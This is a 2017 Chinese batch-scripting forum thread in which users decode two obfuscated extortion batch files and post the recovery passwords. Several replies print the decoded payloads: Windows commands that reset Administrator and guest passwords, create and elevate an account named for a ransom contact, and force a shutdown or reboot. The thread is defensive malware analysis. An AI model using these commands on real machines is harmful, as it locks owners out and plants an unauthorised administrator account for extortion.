标题: [其他] [已解决]这两种批处理怎么解密 [打印本页]
作者: Blitz 时间: 2017-10-10 16:22 标题: [已解决]这两种批处理怎么解密
看过论坛里的帖子,知道文件头混淆加密的用copy nul+a.bat b.bat,用QBFC转成exe的用od设断点看路径,但是这两个批处理不会解。。。
上传附件了,注意!!!!!!这两个是别人发的敲竹杠,谨慎运行
作者: 0000 时间: 2017-10-10 19:59
看到名字就知道是病毒了
batgame.com ----- bat吧 (百度贴吧) 里的一个坑爹 病毒 作品
作者: 0000 时间: 2017-10-10 20:07
c:bat- echo \xEF\x7E\x70\xC7\xCC\x3F\xE9\x56\x38...
- net user Administrator zfw123
- net user 要密码加QQ1845016856 zfw123 /add
- Shutdown -L
- echo \xEF\x7E\x70\xC7\xCC\x3F\xE9\x56\x38...
复制代码
作者: 老刘1号 时间: 2017-10-10 20:16
com文件直接rar打开
然而并没有加密,仅仅是混淆,73-75行为勒索代码
作者: Blitz 时间: 2017-10-10 20:22
回复 4# 老刘1号
能不能详细说说
作者: 见与不见 时间: 2017-10-12 23:21
本帖最后由 见与不见 于 2017-10-12 23:56 编辑
xx.COM里面是upx壳的命令行程序,解密:- ECHO OFF
- net user Administrator CNM5418
- net user guest CNM5418
- net user 要密码加QQ1982949259 CNM5418 /add
- net localgroup administrators 要密码加QQ1982949259 /add
- shutdown -f -r -t 0
复制代码
bat脚本上面有已经给你解密了。
解密方法(鼠标戳一下)
作者: Blitz 时间: 2017-10-13 13:04
回复 6# 见与不见
谢谢你!
作者: 1055367558 时间: 2017-10-13 19:08
回复 1# Blitz
能说下密码吗?手贱点开了
作者: 见与不见 时间: 2017-10-13 19:39
回复 8# 1055367558
密码在回帖里面都有
作者: 见与不见 时间: 2017-10-13 19:41
回复 9# 见与不见
zfw123 或 CNM5418
欢迎光临 批处理之家 (http://www.bathome.net/) |
Powered by Discuz! 7.2 |